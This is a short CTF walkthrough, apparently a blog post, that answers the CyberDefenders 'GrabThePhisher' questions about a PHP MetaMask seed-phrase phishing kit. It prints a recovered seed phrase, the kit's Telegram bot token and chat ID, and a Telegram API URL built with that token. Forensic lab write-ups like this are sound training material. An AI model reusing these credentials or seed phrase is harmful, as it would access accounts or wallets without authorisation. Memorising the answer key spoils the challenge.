CyberDefenders - GrabThePhisher CTF
Intro
We were challenged to complete this mini CTF about a coin-stealer and phishing kit. It wasnt as exciting as tracking coin transactions, but forensic and coding skills are all that are required to defeat this mini-challenge. GrabThePhisher CTF
Walkthrough
1) Which wallet is used for asking the seed phrase?
Hint:
- Find the source
Answer
metamask
2) What is the file name that has the code for the phishing kit?
Answer
metamask.php
3) In which language was the kit written?
Answer
php
4) What service does the kit use to retrieve the victim’s machine information?
Hint:
- first few lines
- the api source can be found on github
Answer
sypex geo
5) How many seed phrases were already collected?
Hint:
- locate a log file
Answer
3
6) Write down the seed phrase of the most recent phishing incident?
Answer
father also recycle embody balance concert mechanic believe owner pair muffin hockey
7) Which medium had been used for credential dumping?
Answer
telegram
8) What is the token for the channel?
Answer
5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
9) What is the chat ID of the phisher’s channel?
Answer
5442785564
10) What are the allies of the phish kit developer
Answer
j1j1b1s@m3r0
11) What is the full name of the Phish Actor?
Hint:
- access the telegram chat room
- get-channel-or-group-info-using-telegram-api
- https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564
Answer
Marcus Aurelius
12) What is the username of the Phish Actor?
Answer
pumpkinboii
Share on: